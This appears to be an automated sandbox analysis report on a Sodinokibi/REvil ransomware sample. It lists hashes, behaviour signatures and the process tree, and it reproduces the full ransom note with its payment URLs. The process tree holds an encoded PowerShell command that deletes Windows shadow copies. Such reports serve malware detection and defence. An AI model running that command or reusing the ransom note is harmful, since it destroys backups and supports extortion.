Analysis

  • max time kernel
    127s
  • max time network
    123s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:42

General

  • Target

    f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3.exe

  • Size

    165KB

  • MD5

    d3e026324b81c755f9058d7a42e96c75

  • SHA1

    35d30a689c4b826e43d9255574fa09965c0a6ba7

  • SHA256

    f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3

  • SHA512

    e9eb060168da1db8dafac357835ffc2272dc3fdbae31c77d810c188299657c824255cc1f337ac25420c57ebe821a838f4e92e5fdf7778a4a6692e777305b3913

Score
10/10

Malware Config

Extracted

Path

C:\sah215mz-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. CDHFUND. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension sah215mz. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/177118F8C7CC3261 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/177118F8C7CC3261 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: iLBm3kDpR5/vPGeadWv78QlIiOmLOm7NWdvC83pdjj7q64VX8kwYSLfw7cwBo6/U pKaCDJ629xSzkWdgIHSBkVRSV4ZN3pGUUlkgMn2C8ppvJONkIaZCJ5Y+/OChh4vo DyPiZ+wC7jku+gpTe+Uftydfvje0dE2g97I8paEezkLeH3+H9THHFqWHs8aOQ+RG AANeyg84bwJTJ2Et6D9RRPYie+XQF1I0P0n1Mua/whvvnSaGr5CoVI4q9HFgjEyd l5HJPInnI0FXYp4p02RwOR9pkiho7i3K4JIfI7WublnjjFhX1R0Df3LYX1xEGydJ ZXy6XjgljCDH2BmAO/fGQzpubjgB3e2fdUz1h7wFPX0So7FMdk8U4A4e4fDM0cJD AyYtobGG6broLuHYPYxChm+SmHKaFYZjwuLoUimMU6ei+bY+PX8pJHUSvPnxLogM M9gin1Toz15fN62pk2oUExYtvWtYqqCXHx9bw5leAKJ8yl+jMkBExMWfX//eTyX8 08Qmap3TikzEaAWsea9AFMFJ+zVTPvXPsm5KAjl5C/oLqhZ4n1KAK+sZ9ypmZbxw ZVsNB2b14Dxgn/FwrrVtkDgLfpUw4ZJ1LcPGxi/sMeVvq0eLHdLM/ioF4LhT1aeM gwkmfLLLPHyzAPzxrtUfPeUjAXq5q1fkl120TMUAGEDiJE5dEiuzXLJmtn6AOwN4 EDrgUhn0Cf+gVQvDJxQuQpc1UYUxYhorAqU7FMGA1yQjX5pOREGQN52xGN34zJZW 5zpd7q3BsNSxvLdzQ5uNYnFrtLE0JMPEnyDsB3W6Ivl7zuUGngGauNCsDV5Y/BD3 uIt0fUSXXqDB9IxOtn9X3p2oPjsCNhOoYZSt39jweavSQaQKJsYL9CmEZxxGiN+b T4iwNJo8u/xKCYrtQWEoNgE/wDOgnjG4F15ds2C2VfEoXPgLLzt8JzaL1IypdjDt zkQTya2vef1OOKB7DWOZj7LuWTJy71wnlHbYCEkamiSENvmjsZmkvEvwljSnUEks gyPNzZaGdX5F7iIjoGhFIa4w401JTLYDNGwFKXdTXdj8Fxe/SJfvkkkL4jtOCdm6 v+AahaCNQDpUk2oam1xhogLAJbR20VOf6P9+cvBQe3lbC/AfjyexD22KPPEehgaI Extension name: sah215mz ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/177118F8C7CC3261

http://decryptor.top/177118F8C7CC3261

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3.exe
    "C:\Users\Admin\AppData\Local\Temp\f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2800
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1584
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1420
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1660

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1584-122-0x000002287C7E0000-0x000002287C802000-memory.dmp
      Filesize

      136KB

    • memory/1584-126-0x000002287C6D3000-0x000002287C6D5000-memory.dmp
      Filesize

      8KB

    • memory/1584-125-0x000002287C6D0000-0x000002287C6D2000-memory.dmp
      Filesize

      8KB

    • memory/1584-127-0x000002287C990000-0x000002287CA06000-memory.dmp
      Filesize

      472KB